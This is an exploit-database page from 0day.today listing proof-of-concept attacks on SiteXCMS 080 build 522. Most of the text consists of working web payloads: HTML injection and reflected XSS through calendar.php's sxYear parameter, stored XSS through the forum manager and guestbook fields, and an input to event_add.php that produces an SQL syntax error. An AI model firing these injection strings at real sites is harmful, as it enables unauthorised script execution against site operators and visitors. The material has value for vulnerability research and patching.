[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SiteXCMS 080 build 522 Multiple Vulnerabilities

Author
lemlajt
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15439
Category
web applications
Date add
23-02-2011
Platform
php
# author: lemlajt
# software : SiteXCMS @ sourceforge.net
# version: 080 build 522
# tested on: linux
# cve :
#

 
=[ PoC : html injection ]=

http://localhost/www/cmsadmins/SiteXCMS_080_build_522/calendar.php?sxMonth=1&sxYear=<h1>te<br>st</h1>
   

=[ Poc : xss ]=
http://localhost/www/cmsadmins/SiteXCMS_080_build_522/calendar.php?sxMonth=1&sxYear=<body onload=alert(1)>

=[ Poc : persistant xss ]=

1. visit http://localhost/www/cmsadmins/SiteXCMS_080_build_522/admin/forums_manager.php
2. on 'Add New Forum' type:
$name2="><body onload=alert(1)>
and submit.
3. smile to your xss

=[ PoC : sql injection ]=
POST http://localhost/www/cmsadmins/SiteXCMS_080_build_522/admin/event_add.php
$content="><body onload=alert(31)>

(and we gets an error:
"SiteX experienced error #803 with an SQL bash readout of : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'persistant')>

', '', '1')' at line 1"

=[ PoC : xss ]=
POST http://localhost/www/cmsadmins/SiteXCMS_080_build_522/guestbook_sign.php
$name = "><body onload=alert(1)>

# *



#  0day.today [2024-11-15]  #